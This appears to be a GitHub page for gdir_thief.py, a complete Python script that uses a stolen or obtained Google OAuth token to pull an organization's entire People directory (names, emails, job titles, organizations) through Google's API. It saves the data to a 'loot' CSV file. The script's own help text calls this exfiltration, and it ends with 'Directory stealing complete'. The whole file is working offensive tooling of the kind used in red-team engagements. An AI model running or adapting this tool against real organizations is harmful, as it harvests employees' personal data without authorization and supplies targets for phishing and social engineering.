-
Notifications
You must be signed in to change notification settings - Fork 20
/
Copy pathgdir_thief.py
146 lines (113 loc) · 4.33 KB
/
gdir_thief.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
import os.path
import getopt
import sys
import time
import csv
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from google.oauth2.credentials import Credentials
SCOPES = ['https://www.googleapis.com/auth/directory.readonly']
### Builds the G-Drive API service
def build_service():
creds = None
if os.path.exists('./credentials/token.json'):
creds = Credentials.from_authorized_user_file('./credentials/token.json', SCOPES)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'./credentials/credentials.json', SCOPES)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open('./credentials/token.json', 'w') as token:
token.write(creds.to_json())
service = build('people', 'v1', credentials=creds)
return service
def get_dir(service):
full_directory = []
print('[*] Fetching the Organization\'s Google People Directory. This could take a while...')
page_token = None
while True:
results = service.people().listDirectoryPeople(
sources='DIRECTORY_SOURCE_TYPE_DOMAIN_PROFILE',
readMask='emailAddresses,organizations',
pageSize=1000,
pageToken=page_token).execute()
try:
directory = results.get('people', [])
time.sleep(1)
except Exception as e:
print('[*] An Error occured fetching the directory: %s' % str(e))
sys.exit(2)
try:
page_token = results.get('nextPageToken', None)
except Exception as e:
print('[*] An Error occured fetching the next pagination token: %s' % str(e))
if page_token is None:
break
if not directory:
print('[*] No directory found.')
exit(2)
else:
full_directory.append(directory)
return full_directory
def print_csv(full_directory):
print('[*] Writing Directory to CSV')
file = open('./loot/directory.csv', 'w')
file.write("First Name, Last Name, Email, Position, Orgnanization\n")
for directory in full_directory:
for person in directory:
firstname = ""
lastname = ""
email = ""
orgname = ""
jobtitle = ""
emails = person.get('emailAddresses', [])
orgs = person.get('organizations', [])
if emails:
email = emails[0].get('value')
fullname = email.split('@', 1)[0]
if '.' in fullname:
firstname, lastname = fullname.strip().split('.', 1)
firstname = firstname.replace(",", "-")
firstname = firstname.capitalize()
lastname = lastname.replace(",", "-")
lastname = lastname.capitalize()
if orgs:
orgname = str(orgs[0].get('name'))
orgname = orgname.replace(",", "-")
if orgname == 'None':
orgname = ''
jobtitle = str(orgs[0].get('title'))
jobtitle = jobtitle.replace(",", "-")
if jobtitle == 'None':
jobtitle = ''
file.write(firstname + "," + lastname + "," + email + "," +
jobtitle + "," + orgname + "\n")
file.close()
def main():
# usage
usage = '\nusage: python3 gdir_thief.py [-h]\n'
#help
help = '\nThis Module will connect to Google\'s People API using an access token and '
help += 'exfiltrate the organization\'s\nPeople directory. It will output a CSV '
help += 'file to ./loot/directory.csv\n'
try :
opts, args = getopt.getopt(sys.argv[1:], "h", ["help"])
except getopt.GetoptError as err:
print(str(err))
print(usage)
sys.exit(2)
for opt, arg in opts:
if opt in ("-h", "--help"):
print(help)
sys.exit()
service = build_service()
directory = get_dir(service)
print_csv(directory)
print('[*] Directory stealing complete')
if __name__ == '__main__':
main()